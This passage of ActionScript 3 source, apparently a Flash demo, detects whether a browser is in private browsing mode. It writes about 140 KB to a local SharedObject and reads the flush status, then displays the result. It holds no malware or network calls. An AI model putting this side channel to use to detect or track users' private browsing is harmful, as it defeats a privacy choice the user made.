			var kissSO:SharedObject = SharedObject.getLocal("kissAndTell");
			kissSO.data.value = getDataString(140);

			var status:String;

			try
			{
				status = kissSO.flush();
				kissSO.addEventListener(NetStatusEvent.NET_STATUS, netStatusHandler);
			}
			catch(ex:Error)
			{
				trace("Save failed - private browsing mode");
				setPrivateText();
			}

			if(status && status == SharedObjectFlushStatus.PENDING)
			{
				trace("Pending status - normal browsing mode");
			}

			/***  Changed in the newer versions of the Flash Player 10.1 beta ***/
			//If we can save more than 100kb then we're in Private Mode
			else if(status && status == SharedObjectFlushStatus.FLUSHED)
			{
				setPrivateText();
			}
		}

		//Listening to this event just to prevent exception on debug players
		private function netStatusHandler(event:NetStatusEvent):void
		{
			trace("event.info.code: " + event.info.code);
		}

		private function setPrivateText():void
		{
			_tf.text = "Private Browsing Mode";
			_tf.backgroundColor = 0xAA2222;
		}

		private function createTF():void
		{
			_tf = new TextField();
			_tf.autoSize = TextFieldAutoSize.LEFT;
			_tf.defaultTextFormat = new TextFormat("Arial, Verdana", 20, 0xFFFFFF, true, null, null, null, null, null, 10, 10);
			_tf.text = "Normal Browsing Mode";
			_tf.backgroundColor = 0x22AA22;
			_tf.background = true;
			addChild(_tf);
		}

		private function getDataString(kb:int):String
		{
			var t:int = getTimer();
			var word:String = "GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_";
			var count:int;
			var a:Array = new Array();
			var lenNeeded:int = kb * 1024;
			while(count * word.length < lenNeeded)
			{
				a.push(word);
				count++;
			}

			var ret:String = a.join("");
			trace("time for generating " + kb + "kb: " + String(getTimer() - t) + " ml");
			return ret;
		}

	}
}